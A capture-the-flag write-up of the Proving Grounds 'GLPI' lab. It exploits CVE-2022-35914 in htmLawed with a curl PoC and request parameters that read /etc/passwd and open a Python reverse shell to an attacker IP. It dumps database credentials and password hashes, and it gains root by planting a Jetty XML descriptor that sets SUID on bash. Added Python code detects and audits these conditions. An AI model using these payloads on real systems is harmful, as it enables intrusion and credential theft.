PG - GLPI

In this walkthrough, we will be going through the GLPI room from Proving Grounds. This room is rated as Easy on the platform and consists of exploiting CVE-2022-35914 to get the initial foothold. With the DB creds from the config files, we then perform lateral movement, and finally privilege escalation is done by exploiting a Jetty server instance running on the internal localhost. So, let's get started without any delay.

GLPI

Machine Info:

Title: GLPI
IP address: 192.168.193.242
Difficulty: Easy
OS: Linux
Description: GLPI is an Easy rated Linux machine which requires exploitation of CVE-2022-35914 in order to get the initial foothold. With the DB creds in config files, the attacker has to perform lateral movement, and at last privilege escalation is done via exploitation of a Jetty server instance running on an internal localhost.

Enumeration:

  • I started off with a regular aggressive nmap scan and found only two open ports – 22 (SSH) and 80 (HTTP).

$ sudo nmap -A 192.168.193.242
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-25 12:51 IST

Nmap scan report for 192.168.193.242
Host is up (0.21s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Authentication - GLPI
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 2.6.X (86%)
OS CPE: cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 2.6.18 - 2.6.22 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   207.77 ms 192.168.45.1
2   207.71 ms 192.168.45.254
3   208.58 ms 192.168.251.1
4   208.72 ms 192.168.193.242

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.48 seconds

nmap scan

  • Enumerated the web server on port 80 and it revealed a login panel for GLPI.

GLPI login panel

  • Fired gobuster at the target to reveal hidden directories. It returned a bunch of directories in the results.

gobuster dir -u http://192.168.193.242/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x php

gobuster scan

  • Looking inside the /files directory revealed a directory listing of various assets related to the web application.

Index of /files

Initial Access:

  • Next, I looked into the /vendor directory, which exposes the htmLawed 1.2.6 test application; this version is vulnerable to CVE-2022-35914. I used the exploit below against it.

Exploit: https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/POC_2022-35914.sh

#!/bin/bash

# PoC for CVE-2022-35914: posts hhook=exec with text=id to the htmLawed test script
# and extracts the command output from the HTML the script returns.
curl -s -d 'sid=foo&hhook=exec&text=id' -b 'sid=foo' http://192.168.193.242/vendor/htmlawed/htmlawed/htmLawedTest.php |egrep '\&nbsp; \[[0-9]+\] =\&gt;'| sed -E 's/\&nbsp; \[[0-9]+\] =\&gt; (.*)<br \/>/\1/'

htmLawedTest.php

  • I captured the request with Burp Suite and added the parameters below to it before forwarding it to the server. Once the request was processed, we got the contents of the /etc/passwd file back.

sid=1rpcfmnkocd44m3mdtg1jfj7qm&text=call_user_func&hhook=array_map&hexec=passthru&spec[0]=&spec[1]=cat+/etc/passwd

Burpsuite POST request

dumping /etc/passwd file

  • Next, we use the parameters below to spawn a shell on the target that connects back to our netcat listener.

sid=19r7u6o4pl0kn34q54le48sghm&text=call_user_func&hhook=array_map&hexec=passthru&spec[0]=&spec[1]=python3+-c+'import+socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.154",80));os.dup2(s.fileno(),0);+os.dup2(s.fileno(),1);+os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

got initial access
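From the defender's side, the request pattern above is easy to spot: the htmLawed test script is a developer tool that has no business being reachable on a production GLPI install, and the hook parameters are a clear exploitation signature. The following Python is an added example (not part of the original walkthrough) that flags such requests in Apache combined-format access logs; the log lines are constructed, and the IPs and timestamps in them are made up.

```python
import re
from typing import Dict, List, Optional

# Apache combined log format (the sample lines further down are constructed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# The htmLawed test harness should never be reachable in production, so any hit
# on it is worth an alert. Requests carrying the hook parameters abused by
# CVE-2022-35914 are escalated to "high".
TEST_SCRIPT = "htmlawedtest.php"
HOOK_PARAMS = ("hhook=", "hexec=")


def classify_request(line: str) -> Optional[Dict[str, str]]:
    """Return an alert record for a log line, or None if it is not of interest."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if not path.lower().endswith(TEST_SCRIPT):
        return None
    severity = "medium"
    # POST bodies are not logged, so a POST to the test script is treated as
    # probable exploitation; hook parameters in the query string are conclusive.
    if m.group("method") == "POST" or any(p in query.lower() for p in HOOK_PARAMS):
        severity = "high"
    return {"ip": m.group("ip"), "method": m.group("method"), "path": path,
            "status": m.group("status"), "severity": severity}


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Run classify_request over every line and keep the hits."""
    return [r for r in (classify_request(l) for l in lines) if r]


# Constructed sample: one benign request, then a probe, a POST and a GET with hook parameters.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Jan/2024:12:55:01 +0530] "GET /index.php HTTP/1.1" 200 5120',
    '10.0.0.9 - - [25/Jan/2024:12:56:10 +0530] "GET /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 200 9831',
    '10.0.0.9 - - [25/Jan/2024:12:56:42 +0530] "POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 200 1204',
    '10.0.0.9 - - [25/Jan/2024:12:57:03 +0530] "GET /vendor/htmlawed/htmlawed/htmLawedTest.php?hhook=exec&text=id HTTP/1.1" 200 1204',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The same logic applies to a WAF or reverse-proxy log that records request bodies, where the `spec[]`/`hexec` parameters would then be visible for POSTs as well.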

Lateral Movement (Betty):

  • Once we landed on a shell, I enumerated the file system for files containing sensitive information and found the DB creds for the GLPI database in the config_db.php file.

cat config_db.php

  • Used the found creds to log into the DB and dump the contents of the users table, which also includes the users' password hashes.

mysql -u glpi -p
# enter the password from config_db.php at the prompt (-p followed by a space prompts;
# any argument after it would be taken as the database name, not the password)

show databases;
use glpi;
show tables;
select * from glpi_users;

interacting with the DB

dumping hashes

  • Once I got the password hash of user betty, I tried to replace it with the hash of a password I generated in order to get access as her. However, that didn't seem to work.

betty: $2y$10$jG8/feTYsguxsnBqRG6.judCDSNHY4it8SgBTAHig9pMkfmMl9CFa

password: $2a$10$mRrl51am2AJdOJPxNLIvTOhonLn5x0mr2nJQ4pwj1c4usbnPI5AyS

update glpi_users SET password = '$2a$10$mRrl51am2AJdOJPxNLIvTOhonLn5x0mr2nJQ4pwj1c4usbnPI5AyS' where name = 'betty';

updating betty password

  • Looking through the other tables, I found betty's plaintext password stored in the glpi_itilfollowups table.

select * from glpi_itilfollowups;

Dumping glpi_itilfollowups table

  • Using the found password, I logged into the target via SSH as user betty and captured the local flag.

logged in as betty via SSH

local flag

Privilege Escalation:

  • Next, I enumerated the running processes on the target using the command below. It revealed that a web server is running on localhost on port 8080.

ps auxww

ps auxww

  • Set up SSH local port forwarding so that the target's port 8080 is reachable on my local port 1234.

ssh -L 1234:localhost:8080 betty@192.168.193.242

performing SSH port forwarding

  • Once the forwarding was set up, I was able to reach the web server on port 1234 on my localhost. It was running a Jetty server.

localhost:1234

  • Found that the running Jetty server is vulnerable to the technique described in the resource below.

Resource: https://twitter.com/ptswarm/status/1555184661751648256?lang=en

Twitter post related to Jetty

  • First, we create a root.sh file that gives the bash binary SUID rights (the commands below set the SUID bit directly on /bin/bash). We then use the XML context file below to make Jetty execute root.sh; for that, the XML file only has to be placed inside the Jetty webapps directory, where Jetty picks it up and deploys it.

Exploit: https://github.com/Mike-n1/tips/blob/main/JettyShell.xml

<?xml version="1.0"?>
<!DOCTYPE Configure PUBLIC "-//Jetty//Configure//EN" "https://www.eclipse.org/jetty/configure_10_0.dtd">
<Configure class="org.eclipse.jetty.server.handler.ContextHandler">
    <Call class="java.lang.Runtime" name="getRuntime">
        <Call name="exec">
            <Arg>
                <Array type="String">
                    <Item>/tmp/root.sh</Item>
                </Array>
            </Arg>
        </Call>
    </Call>
</Configure>

cd /opt/jetty/jetty-base/webapps/          # Jetty hot-deploys *.xml context files placed here
echo "chmod +s /bin/bash" > /tmp/root.sh   # root.sh sets the SUID bit on bash when Jetty (running as root) executes it
chmod +x /tmp/root.sh

nano shell.xml                             # paste the XML above; Jetty deploys it and runs /tmp/root.sh

creating root.sh

  • Once the SUID bash binary is in place, execute it with the command below and become root.

bash -p

got root
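The root cause on the privilege escalation side is a Jetty hot-deploy directory that a low-privileged user can write to while Jetty itself runs as root. As an added example, not from the original post, the Python below audits a webapps directory for exactly those conditions: loose write permissions, a root-owned service, and context descriptors nobody expects. The path is the one from the walkthrough, whether Jetty runs as root is passed in (read it from the user column of `ps auxww` as above), and `demo_scenario` rebuilds the situation in a temporary directory.

```python
import os
import stat
import tempfile
from typing import Iterable, List

# Path from the walkthrough; the real jetty.base location on a given host is an assumption.
JETTY_WEBAPPS = "/opt/jetty/jetty-base/webapps"


def audit_deploy_dir(path: str, runs_as_root: bool,
                     expected_xml: Iterable[str] = ()) -> List[str]:
    """Flag conditions that let a local user escalate through Jetty's deployer.

    Jetty hot-deploys any *.xml context descriptor dropped into this directory
    and executes its <Call> elements with the privileges of the Jetty process,
    so the directory must not be writable by other users and Jetty should not
    run as root. Descriptors missing from the expected list are reported too.
    """
    findings: List[str] = []
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return [f"{path}: not found"]
    if mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable")
    elif mode & stat.S_IWGRP:
        findings.append(f"{path}: group-writable")
    if runs_as_root:
        findings.append("jetty runs as root: a deployed descriptor executes as root")
    for name in sorted(os.listdir(path)):
        if name.lower().endswith(".xml") and name not in set(expected_xml):
            findings.append(f"{os.path.join(path, name)}: unexpected context descriptor")
    return findings


def demo_scenario() -> List[str]:
    """Constructed reproduction of the walkthrough's conditions in a temp directory."""
    webapps = tempfile.mkdtemp(prefix="jetty-webapps-")
    os.chmod(webapps, 0o777)                        # writable by any local user
    with open(os.path.join(webapps, "shell.xml"), "w") as f:
        f.write("<Configure/>")                     # stand-in for an injected descriptor
    return audit_deploy_dir(webapps, runs_as_root=True, expected_xml=("ROOT.xml",))


if __name__ == "__main__":
    # runs_as_root must be set from the owner of the Jetty process (ps auxww), not from this script's uid.
    for line in audit_deploy_dir(JETTY_WEBAPPS, runs_as_root=True):
        print(line)
```

The fix for each finding is the obvious one: tighten the directory to the Jetty administrator's account, run Jetty under a dedicated unprivileged user, and treat any descriptor outside the expected set as an incident.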

  • Captured the root flag and completed the machine.

proof flag

Conclusion:

So that was GLPI for you. We started off with a regular nmap scan and found two open ports – 22 (SSH) and 80 (HTTP). Enumerating the web server on port 80 showed that it runs GLPI and exposed an htmLawed directory. Looking online for known exploits showed that it is vulnerable to CVE-2022-35914; using that, we got initial access on the target. Next, we found DB creds in the config_db.php file. Using those, we enumerated the database and obtained user betty's plaintext password from the glpi_itilfollowups table, then performed lateral movement via SSH with betty's creds. Moving on, we set up SSH port forwarding of port 8080 and found a Jetty server running. We exploited it using the technique discussed in the Twitter post and got root. On that note, I will take your leave and meet you in the next one. Till then, “Happy hacking”.
